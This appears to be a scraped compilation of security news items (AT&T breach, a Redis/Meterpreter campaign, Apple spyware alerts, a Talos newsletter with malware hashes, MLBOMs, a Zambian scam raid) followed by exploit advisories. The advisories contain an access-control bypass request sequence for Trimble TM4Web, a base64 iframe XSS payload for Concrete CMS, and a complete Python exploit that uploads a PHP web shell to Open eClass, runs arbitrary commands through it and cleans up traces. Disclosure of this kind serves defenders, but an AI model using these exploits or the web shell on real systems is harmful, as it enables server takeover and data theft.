We've made it easy for you to check if your data has been exposed in the AT&T breach.

AT&T has notified US state authorities and regulators about its recent (or not) data breach, saying 51,226,382 people were affected.

For those that have missed the story so far:

*   Back in 2021, a hacker named Shiny Hunters claimed to have breached AT&T.
*   On March 20, 2024, we reported how the data of over 70 million people was posted for sale on an online cybercrime forum. The seller claimed the data came from the Shiny Hunters breach. However, AT&T denied (both in 2021 and in March, 2024) that the data came from its systems.
*   On March 30, AT&T reset customer passcodes after a security researcher discovered the encrypted login passcodes found in the leaked data were easy to decipher.
*   Finally, on April 2, 2024, AT&T confirmed that 73 million current and former customers were caught up the data leak.

Weirdly enough, in the data breach notification, AT&T says the date of discovery of the breach was March 26, 2024. AT&T has still not disclosed the source of the leak, but says the data appears to be from June 2019 or earlier.

Malwarebytes VP of Consumer Privacy, Oren Arar, describes the AT&T breach as “especially risky” because of the type of data that’s been exposed.

> “SSN, name, date of birth—this is personal identifiable information (PII) that cannot be changed, and if scammers get their hands on it, it just makes their work in stealing people’s identities a lot easier. In addition, this exposed data was published on the internet – in a way that anyone could access it, and not on the dark web where you need some expertise to find it”.

Malwarebytes has a super easy tool—Malwarebytes Digital Footprint Portal—that allows you to check if your data was part of the AT&T breach. Just click the button below, enter your email address, and we’ll let you know what personal information we find.

We will keep you posted of any new developments in this case. Stay tuned!

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 How to check if your data was exposed in the AT&#038;T breach 

Attackers have compromised an 8-year-old version of the cloud platform to distribute various malware that can take over infected systems.

Source: Age Foto Stock via Alamy Stock Photo

Attackers are using an 8-year-old version of the Redis open-source database server to maliciously use Metasploit's Meterpreter module to expose exploits within a system, potentially allowing for takeover and distribution of a host of other malware.

Researchers from AhnLab Security Intelligence Center (ASEC) said in a blog post that attackers likely are exploiting inappropriate settings or a vulnerability present in an implementation of Redis to distribute Meterpreter for nefarious use.

"Such malware strains attack Redis servers open to the public on the Internet with the authentication feature disabled," ASEC researcher Sanseo wrote in the post. "After gaining access to Redis, threat actors can install malware through known attack methods."

Meterpreter is an aspect of the legitimate Metasploit pen-testing tool that allows threat actors to fetch various Metasploit modules, or working exploits for known bugs, and then use them on the targeted system, according to ASEC. Metasploit is a tool similar to Cobalt Strike that also is oft-abused by threat actors to execute attacks.

"When Metasploit is installed, the threat actor can take control of the infected system and also dominate the internal network of an organization using the various features offered by the malware," Senseo explained.

**How It's Done**

Redis is an open source, in-memory data structure storage service that is increasingly being used in various ways in cloud environments; its primary purpose is typically for session management, message broker, and queues, according to ASEC. This increased prevalence also is making it a more popular target for attackers, who have abused vulnerable Redis servers to spread a host of malware, including Kinsing, P2PInfect, Skidmap, Migo, and HeadCrab.

By using Metasploit Meterpreter, there are two main attacks methods that actors can employ to spread malware once they've gained access to Redis. One is to register the malware-executing command as a Cron task, and the other is using the SLAVEOF command to set the command as the Slave server of the Redis server that has the malware.

ASEC witnessed an attack targeting a system that used Windows, along with version Redis 3.x, which was developed in 2016. The age of the abused platform means "it was likely vulnerable to attacks that abuse misconfiguration or attacks on known vulnerabilities," Senseo noted.

In the attack, the threat actor first downloaded PrintSpoofer, a privilege escalation tool, in the installation path for Redis. Attackers often use this tool against vulnerable services that are not managed properly or have not been patched to the recent version; in fact, ASEC has witnessed a flurry of these attacks against Redis since the second half of last year.

"The difference between the cases from the past and the cases now is that PrintSpoofer is installed using the CertUtil tool instead of PowerShell," Senseo explained.

**Meterpreter As Malicious Backdoor**

After installing PrintSpoofer, the threat actor installed Meterpreter Stager — one of two types of the module, the difference between which depends on the way it is installed. Meterpreter is to the Metasploit tool as Beacon is to Cobalt Strike.

When an attacker uses Stager, it means the installation is via the staged version, which downloads Meterpreter directly from the attacker's command-and-control (C2) server. This decreases its footprint version downloading it in a "stageless" way within a payload, according to ASEC.

Once this process is complete, Meterpreter is executed in the memory, which allows the threat actor to take control over the infected system and "also dominate the internal network of an organization using the various features offered by the malware," Senseo wrote.

**Update Now**

ASEC included a list of files, behaviors, and indicators of compromise of the attack in its post to help network administrators identify evidence of the threat on a system.

To avoid being compromised by the attack vector, ASEC advised that administrators of environments with Redis 3.x installed should, at the very least, update the server immediately with available patches to ensure that known vulnerabilities can't be exploited. The best-case scenario, however, would be to update V3 to the latest version of the server.

Administrators should also install security-protection software that restricts external access to Redis servers open to the Internet so they can't be identified and abused, ASEC advised.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Expired Redis Service Abused to Use Metasploit Meterpreter Maliciously

In new threat notification information, Apple singled out Pegasus vendor NSO Group as a culprit in mercenary spyware attacks.

Source: nk Drop via Shutterstock

Apple this week updated its spyware threat notification system to alert and assist users it identifies as targeted by mercenary spyware attacks.

To date, Apple has spotted and alerted users in more than 150 countries that they were targeted in these attacks.

Such spyware attacks target individuals largely because of who they are and what they do, Apple said. While most people will never be targeted by these types of attacks, a small number of people — journalists, activists, politicians, and the like — will potentially be victimized. 

Apple said once it detects spyware it notifies the user within two days. The vendor does provide threat actor attribution, however.

In its notice, Apple pointed fingers at the NSO Group, one of the private companies that develops the mercenary spyware Pegasus that is used in such attacks. "According to public reporting and research by civil society organizations, technology firms, and journalists, individually targeted attacks of such exceptional cost and complexity have historically been associated with state actors, including private companies," stated the notice on Apple's support page. 

Should an individual receive a threat notification, Apple recommends that they seek the help of either Apple or a third party. Apple's notifications never ask the user to click on any link or install an application; the threat notification can be verified simply by signing into applied.apple.com, where the notification will be at the top of the page. 

**About the Author(s)**

Apple Warns Users in 150 Countries of Mercenary Spyware Attacks

The security community is still reflecting on the “What If” of the XZ backdoor.

Thursday, April 11, 2024 14:00

I feel like over the past several years, the “holiday” that is April Fool’s Day has really died down. At this point, there are few headlines you can write that would be more ridiculous than something you’d find on a news site any day of the week. 

And there are so many more serious issues that are developing, too, that making a joke about a fake news story is just in bad taste, even if it’s in “celebration” of a “holiday.” 

Thankfully in the security world, I think we’ve all gotten the hint at this point that we can’t just post whatever we want on April 1 of each calendar year and expect people to get the joke. I’ve put my guard down so much at this point that I actually did legitimately fall for one April Fool’s joke from Nintendo, because I could definitely see a world in which they release a Virtual Boy box for the Switch that would allow you to play virtual reality games. 

But at least from what I saw on April 1 of this year, no one tried to “get” anyone with an April Fool’s joke about a ransomware actor requesting payment in the form of “Fortnite” in-game currency, or an internet-connected household object that in no universe needs to be connected to the internet (which, as it turns out, smart pillows exist!).  

We’re already dealing with digitally manipulated photos of “Satanic McDonalds,” Twitter’s AI generating fake news about the solar eclipse, and an upcoming presidential election that is sure to generate a slew of misinformation, AI-generated photos and more that I hesitate to even make up. 

So, all that is to say, good on you, security community, for just letting go of April Fool’s. Our lives are too stressful without bogus headlines that we, ourselves, generate.  

**The one big thing **

Talos discovered a new threat actor we’re calling “CoralRaider” that we believe is of Vietnamese origin and financially motivated. CoralRaider has been operating since at least 2023, targeting victims in several Asian and Southeast Asian countries. This group focuses on stealing victims’ credentials, financial data, and social media accounts, including business and advertisement accounts. CoralRaider appears to use RotBot, a customized variant of QuasarRAT, and XClient stealer as payloads. The actor uses the dead drop technique, abusing a legitimate service to host the C2 configuration file and uncommon living-off-the-land binaries (LoLBins), including Windows Forfiles.exe and FoDHelper.exe 

**Why do I care? **

This is a brand new actor that we believe is acting out of Vietnam, traditionally not a country who is associated with high-profile state-sponsored actors. CoralRaider appears to be after targets’ social media logins, which can later be leveraged to spread scams, misinformation, or all sorts of malicious messages using the victimized account. 

**So now what? **

CoralRaider primarily uses malicious LNK files to spread their malware, though we currently don’t know how those files are spread, exactly. Threat actors have started shifting toward using LNK files as an initial infection vector after Microsoft disabled macros by default — macros used to be a primary delivery system. For more on how the info in malicious LNK files can allow defenders to learn more about infection chains, read our previous research here. 

**Top security headlines of the week **

**The security community is still reflecting on the “What If” of the XZ backdoor** that was discovered and patched before threat actors could exploit it. A single Microsoft developer, who works on a different open-source project, found the backdoor in xz Utils for Linux distributions several weeks ago seemingly on accident, and is now being hailed as a hero by security researchers and professionals. Little is known about the user who had been building the backdoor in the open-source utility for at least two years. Had it been exploited, the vulnerability would have allowed its creator to hijack a user’s SSH connection and secretly run their own code on that user’s machine. The incident is highlighting networking’s reliance on open-source projects, which are often provided little resource and usually only maintained as a hobby, for free, by individuals who have no connection to the end users. The original creator of xz Utils worked alone for many years, before they had to open the project because of outside stressors and other work. Government officials have also been alarmed by the near-miss, and are now considering new ways to protect open-source software. (New York Times, Reuters) 

**AT&T now says that more than 51 million users were affected by a data breach** that exposed their personal information on a hacking forum. The cable, internet and cell service provider has still not said how the information was stolen. The incident dates back to 2021, when threat actor ShinyHunters initially offered the data for sale for $1 million. However, that data leaked last month on a hacking forum belonging to an actor known as “MajorNelson.” AT&T’s notification to affected customers stated that, "The \[exposed\] information varied by individual and account, but may have included full name, email address, mailing address, phone number, social security number, date of birth, AT&T account number and AT&T passcode." The company has also started filing required formal notifications with U.S. state authorities and regulators. While AT&T initially denied that the data belonged to them, reporters and researchers soon found that the information were related to AT&T and DirecTV (a subsidiary of AT&T) accounts. (BleepingComputer, TechCrunch) 

**Another ransomware group claims they’ve stolen data from United HealthCare, though there is little evidence yet to prove their claim.** Change Health, a subsidiary of United, was recently hit with a massive data breach, pausing millions of dollars of payments to doctors and healthcare facilities to be paused for more than a month. Now, the ransomware gang RansomHub claims it has 4TB of data, requesting an extortion payment from United, or it says it will start selling the data to the highest bidder 12 days from Monday. RansomHub claims the stolen information contains the sensitive data of U.S. military personnel and patients, as well as medical records and financial information. Blackcat initially stated they had stolen the data, but the group quickly deleted the post from their leak site. A person representing RansomHub told Reuters that a disgruntled affiliate of Blackcat gave the data to RansomHub after a previous planned payment fell through. (DarkReading, Reuters) 

**Can’t get enough Talos? **

*   Talos Takes Ep. #178: Turla has been around for 20-plus years at this point, but they're still mixing things up 
*   Vulnerability in some TP-Link routers could lead to factory reset 
*   April’s Patch Tuesday includes 150 vulnerabilities, 60 which could lead to remote code execution 
*   Vietnamese Cybercrime Group CoralRaider Nets Financial Data 
*   Safeguarding Against CoralRaider: Protecting Your Data from Vietnamese Hackers 

**Upcoming events where you can find Talos **

**Botconf** **(April 23 - 26)** 

_Nice, Côte d'Azur, France_

> _This presentation from Chetan Raghuprasad details the Supershell C2 framework. Threat actors are using this framework massively and creating botnets with the Supershell implants._

**CARO Workshop 2024** **(May 1 - 3)** 

_Arlington, Virginia_

> Over the past year, we’ve observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent Countries (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns detailing the commodity and custom-built malware employed by the actor, their discovery and evolution in tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.

**RSA** **(May 6 - 9)** 

_San Francisco, California_    

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
**MD5:** 8c69830a50fb85d8a794fa46643493b2  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Dropper.Generic::1201

**SHA 256:** abaa1b89dca9655410f61d64de25990972db95d28738fc93bb7a8a69b347a6a6  
**MD5:** 22ae85259273bc4ea419584293eda886  
**Typical Filename:** KMSAuto++ x64.exe  
**Claimed Product:** KMSAuto++  
**Detection Name:** W32.File.MalParent

**SHA 256:** 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d  
**MD5:** fd743b55d530e0468805de0e83758fe9  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

**SHA 256:** b8aec57f7e9c193fcd9796cf22997605624b8b5f9bf5f0c6190e1090d426ee31  
**MD5:** 2fb86be791b4bb4389e55df0fec04eb7  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** W32.File.MalParent

**SHA 256:** 58d6fec4ba24c32d38c9a0c7c39df3cb0e91f500b323e841121d703c7b718681  
**MD5:** f1fe671bcefd4630e5ed8b87c9283534  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** PUA.Win.Tool.Hackkms::1201

The internet is already scary enough without April Fool’s jokes

An access control issue in Trimble TM4Web version 22.2.0 allows unauthenticated attackers to access a specific crafted URL path to retrieve the last registration access code and use this access code to register a valid account. If the access code was used to create an Administrator account, attackers are also able to register new Administrator accounts with full rights and privileges.

CVE ID: CVE-2023-27195

Description:  
An access control issue in Trimble TM4Web v22.2.0 allows  
unauthenticated attackers to access a specific crafted URL path to  
retrieve the last registration access code and use this access code to  
register a valid account. If the access code was used to create an  
Administrator account, attackers are also able to register new  
Administrator accounts with full rights and privileges.

Vulnerability Type: Broken Access Control

Vendor of Product: Trimble - Transportation  
(https://transportation.trimble.com/products/TM4Web)

Affected Product Code Base: TM4Web v22.2.0

Affected Component: User registration process

Attack Type: Remote

Impact: Privilege escalation / authentication bypass

Attack Vectors:*1. Accessing the last access code *

GET /inc/tm_ajax.msw?func=UserfromUUID&uuid=

Host: example.host.com

*2. Sending PUT request to create a new user account with previously  
retrieved access code*

PUT /inc/tm_ajax.msw

Host: example.host.com [...]  
WEB_UUID=&USERNAME=ccruchet&FIRST_NAME=test&LAST_NAME=test&COMPANY=test&DEPARTMENT=test&ADDRESS1=test&ADDRESS2=test&CITY=test&STATE_CODE=BC&COUNTRY_CODE=CA&POSTAL_CODE=J3L0B8&PHONE=1111111111&PHONE_EXT=&FAX=&EMAIL=test@gmail.com&LANGUAGE=EN&ACCESS_CODE=XXXXXX&pwd1=Password123&pwd2=Password123&isReadonly=false&func=WebUser

Discoverer: Clément Cruchet (lutzenfried)

References:  
- Official website: https://transportation.trimble.com/products/TM4Web

Trimble TM4Web 22.2.0 Privilege Escalation / Access Code Disclosure

Concrete CMS version 9.2.7 suffers from information disclosure, open redirection, and persistent cross site scripting vulnerabilities.

    # Exploit Title: Multiple Web Flaws in concretecmsv9.2.7# Date: 4/2024# Exploit Author: Andrey Stoykov# Version: 9.2.7# Tested on: Ubuntu 22.04# Blog: http://msecureltd.blogspot.comVerbose Error Message - Stack Trace:1. Directly browse to edit profile page2. Error should come up with verbose stack traceVerbose Error Message - SQL Error:1. Page Settings > Design > Save Changes2. Intercept HTTP POST request and place single quote to "pTemplateID"3. Verbose SQL error message would occurOpen Redirect:1. Login to application2. Click to "Edit This Page" button3. Intercept HTTP GET request4. Enter relevant domain as value for "redirect" parameterStored XSS:1. Edit page2. Add HTML and drag it to the page3. Add XSS payload"><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">

Concrete CMS 9.2.7 Cross Site Scripting / Open Redirect

GUnet OpenEclass E-learning platform version 3.15 suffers from an unrestricted file upload vulnerability in certbadge.php that allows for remote command execution.

    import requestsimport argparseimport zipfileimport osimport sysRED = '\033[91m'GREEN = '\033[92m'YELLOW = '\033[93m'RESET = '\033[0m'ORANGE = '\033[38;5;208m'MALICIOUS_PAYLOAD = """\<?phpif(isset($_REQUEST['cmd'])){        $cmd = ($_REQUEST['cmd']);        system($cmd);        die;}?>"""def banner():    print(f'''{RED}{YELLOW} ============================ Author: Frey ============================{RESET}''')def execute_command(openeclass, filename):    while True:        # Prompt for user input with "eclass"        cmd = input(f"{RED}[{YELLOW}eClass{RED}]~# {RESET}")        # Check if the command is 'quit', then break the loop        if cmd.lower() == "quit":            print(f"{ORANGE}\nExiting...{RESET}")            clean_server(openeclass)            sys.exit()        # Construct the URL with the user-provided command        url = f"{openeclass}/courses/user_progress_data/cert_templates/{filename}?cmd={cmd}"        # Execute the GET request        try:            response = requests.get(url)            # Check if the request was successful            if response.status_code == 200:                # Print the response text                print(f"{GREEN}{response.text}{RESET}")        except requests.exceptions.RequestException as e:            # Print any error that occurs during the request            print(f"{RED}An error occurred: {e}{RESET}")def upload_web_shell(openeclass, username, password):    login_url = f'{openeclass}/?login_page=1'    login_page_url = f'{openeclass}/main/login_form.php?next=%2Fmain%2Fportfolio.php'    # Login credentials    payload = {        'next': '/main/portfolio.php',        'uname': f'{username}',        'pass': f'{password}',        'submit': 'Enter'    }    headers = {        'Referer': login_page_url,    }    # Use a session to ensure cookies are handled correctly    with requests.Session() as session:        # (Optional) Initially visit the login page if needed to get a fresh session cookie or any other required tokens        session.get(login_page_url)        # Post the login credentials        response = session.post(login_url, headers=headers, data=payload)        # Create a zip file containing the malicious payload        zip_file_path = 'malicious_payload.zip'        with zipfile.ZipFile(zip_file_path, 'w') as zipf:            zipf.writestr('evil.php', MALICIOUS_PAYLOAD.encode())        # Upload the zip file        url = f'{openeclass}/modules/admin/certbadge.php?action=add_cert'        files = {            'filename': ('evil.zip', open(zip_file_path, 'rb'), 'application/zip'),            'certhtmlfile': (None, ''),            'orientation': (None, 'L'),            'description': (None, ''),            'cert_id': (None, ''),            'submit_cert_template': (None, '')        }        response = session.post(url, files=files)        # Clean up the zip file        os.remove(zip_file_path)        # Check if the upload was successful        if response.status_code == 200:            print(f"{GREEN}Payload uploaded successfully!{RESET}")            return True        else:            print(f"{RED}Failed to upload payload. Exiting...{RESET}")            return Falsedef clean_server(openeclass):    print(f"{ORANGE}Cleaning server...{RESET}")    # Remove the uploaded files    requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.zip")    requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.php")    print(f"{GREEN}Server cleaned successfully!{RESET}")def main():    parser = argparse.ArgumentParser(description="Open eClass – CVE-CVE-2024-31777: Unrestricted File Upload Leads to Remote Code Execution")    parser.add_argument('-u', '--username', required=True, help="Username for login")    parser.add_argument('-p', '--password', required=True, help="Password for login")    parser.add_argument('-e', '--eclass', required=True, help="Base URL of the Open eClass")    args = parser.parse_args()    banner()    # Running the main login and execute command function    if upload_web_shell(args.eclass, args.username, args.password):        execute_command(args.eclass, 'evil.php')if __name__ == "__main__":    main()

GUnet OpenEclass E-learning 3.15 File Upload / Command Execution

A machine learning bill of materials (MLBOM) framework can bring transparency, auditability, control, and forensic insight into AI and ML supply chains.

Source: Cagkan Sayin via Alamy Stock Photo

COMMENTARY

The days of large, monolithic apps are withering. Today's applications rely on microservices and code reuse, which makes development easier but creates complexity when it comes to tracking and managing the components they use. 

This is why the software bill of materials (SBOM) has emerged as an indispensable tool for identifying what's in a software app, including the components, versions, and dependencies that reside within systems. SBOMs also deliver deep insights into dependencies, vulnerabilities, and risks that factor into cybersecurity.

An SBOM allows CISOs and other enterprise leaders to focus on what really matters by providing an up-to-date inventory of software components. This makes it easier to establish and enforce strong governance and spot potential problems before they spiral out of control.

Yet in the age of artificial intelligence (AI), the classic SBOM has some limitations. Emerging machine learning (ML) frameworks introduce remarkable opportunities, but they also push the envelope on risk and introduce a new asset to organizations: the machine learning model. Without strong oversight and controls over these models, an array of practical, technical, and legal problems can arise. 

That's where machine learning bills of materials (MLBOMs) enter the picture. The framework tracks names, locations, versions, and licensing for assets that comprise an ML model. It also includes overarching information about the nature of the model, training configurations embedded in metadata, who owns it, various feature sets, hardware requirements, and more.

**Why MLBOMs Matter**

CISOs are realizing that AI and ML require a different security model — and the underlying training data and models that run them are frequently not tracked or governed. An MLBOM can help an organization avoid security risks and failures. It addresses critical factors like model and data provenance, safety ratings, and dynamic changes that extend beyond the scope of SBOM.

Because ML environments are in a constant state of flux and changes can take place with little or no human interaction, issues related to data consistency — including where it originated, how it was cleaned, and how it was labeled — are a constant concern.

For example, if a business analyst or data scientist determines that a data set is poisoned, the MLBOM simplifies the task of finding all the various touch points and models that were trained with that data. 

**MLBOMs Can Elevate Protection**

Transparency, auditability, control, and forensic insight are all hallmarks of an MLBOM. With a comprehensive view of the "ingredients" that go into an ML model, an organization is equipped to manage its ML models safely.

Here are some ways to build a best practice framework around an MLBOM:

*   Recognize the need for an MLBOM: It's no secret that ML fuels business innovation and even disruption. Yet it also introduces significant risks that can extend to reputation, regulatory compliance, and legal issues. Having visibility into ML models is critically important.
    

*   Conduct essential due diligence: An MLBOM should integrate with the CI/CD pipeline and deliver a high level of clarity. Support for standard frameworks like JSON or OWASP's CycloneDX can unify SBOM and MLBOM processes.
    

*   Analyze policies, processes, and governance: It's essential to sync an MLBOM with an organization's workflows and business processes. This increases the odds that ML pipelines will work as intended, while minimizing risks related to cybersecurity, data privacy, compliance, and other risk-associated areas.
    

*   Use an MLBOM with machine learning gates: Rigorous controls and gateways lead to essential AI and ML guardrails. In this way, the business and the CSO can build on successes and harness ML to unlock greater cost savings, performance gains, and business value.
    

Machine learning is radically changing the business and IT landscape. By extending proven SBOM methodologies to ML through MLBOMs, it's possible to take a giant step toward boosting machine learning performance and protecting data and assets.

**About the Author(s)**

CISO, Protect AI

Diana Kelley is CISO for Protect AI. She was Cybersecurity Field CTO for Microsoft, Global Executive Security Advisor at IBM Security, GM at Symantec, VP at Burton Group (now Gartner), a Manager at KPMG, CTO and co-founder of SecurityCurve, and Chief vCISO at SaltCybersecurity.

Why MLBOMs Are Useful for Securing the AI/ML Supply Chain

Phony call center company conducted online fraud and other Internet scams.

Source: JJ Gouin via Alamy Stock Photo

Law enforcement in Zambia this week raided a Chinese company that hired unsuspecting young Zambian citizens purportedly for positions at a call center that instead was a front for cybercrime and money laundering.

The so-called Golden Top Support services company directed the employees "with engaging in deceptive conversations with unsuspecting mobile users across various platforms such as WhatsApp, Telegram, chatrooms and others, using scripted dialogues," Nason Banda, director general of Zambia's Drug Enforcement Commission (DEC) told the BBC, which reported on the case. The DEC, law enforcement, immigration, and anti-terrorism units assisted in the investigation and arrests at the shell company.

A recent rise in bank fraud in Zambia raised alarms and led authorities there to investigate and ultimately raid the company. Banda said the "illicit operations extended beyond Zambia's borders," including victims in Singapore, Peru, the United Arab Emirates (UAE), and other parts of Africa.

Authorities found some 13,000 SIM cards, 11 SIM boxes for disguising the caller's location, and firearms, and 22 Chinese citizens were arrested. Banda said Zambian workers were charged and release in order to cooperate in the investigation.

**About the Author(s)**

Tag

#auth